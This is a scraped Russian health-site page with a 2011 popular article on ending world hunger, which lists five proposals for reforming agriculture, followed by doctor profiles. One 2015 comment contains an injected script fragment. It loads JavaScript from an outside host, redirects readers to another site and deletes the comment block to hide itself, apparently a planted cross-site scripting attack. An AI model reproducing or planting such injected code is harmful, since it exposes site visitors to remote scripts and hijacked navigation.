Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Можно ли победить голод?  >>  Можно ли победить голод?
 
Обратная связь
 

Можно ли победить голод?

Размер шрифта
14 октября 2011 01:41
  • google_analytics: false
  • Нравится

Пока вы читаете эти строки, миллиард человек на планете погибает от голода. Если не решить проблему продовольствия уже сейчас, то в ближайшее время глобальные катаклизмы и астероиды не понадобятся: мы все умрем от голода.

1

Человек научился летать в космос, победил оспу и изобрел шариковые ручки, но так и не справился с тем, отчего люди умирали сто тысяч лет назад. К 2050 году население земного шара увеличится до девяти миллиардов. Что мы все будем есть?

Группа ученых из Канады, Швеции, США и Германии, предлагает свой вариант ответа на этот вопрос: надо изменить подход к организации сельского хозяйства. Это решит проблему и голода, и экологии. Итак, вот их предложения:


  1. Прекратить расширение сельскохозяйственных угодий и вырубку тропических лесов для расчистки земель. Чем больше лесов, тем меньше проблем с кислородом.

  2. Эффективней использовать нынешние сельскохозяйственные ресурсы. Современные методы позволяют увеличить объем продуктов питания на 60% без расширения производства. Но бизнес мало заинтересован в инвестициях такого рода. А ведь еды может стать в полтора раза больше!

  3. Изменить стратегию планирования. Рыночная экономика, господствующая в мире, противопоставлена плановой, а ведь из-за отсутствия планирования идет разбазаривание ресурсов. Где-то ресурсы используются слишком интенсивно, а где-то не используются вообще. Если ресурсы распределять в соответствии с планом, то это в несколько раз повысит эффективность сельского хозяйства.

  4. «Переключить» производство. Многие пахотные земли используются сегодня для производства биотоплива или кормов для животных. Если сменить приоритеты и использовать земли для производства продуктов, то их количество увеличится еще на 50%.

  5. Сократить отходы. Треть всех продуктов по тем или иным причинам (вредители, безалаберность производителей) просто не доходит до потребителя. И если прекратить такой перевод еды в отходы, голодных станет на треть меньше.

Авторы этого масштабного исследования утверждают: можно одновременно накормить всех голодных и улучшить экологию. Исследователи намерены продолжать работу, чтобы донести эту важную информацию до политиков.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:07

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.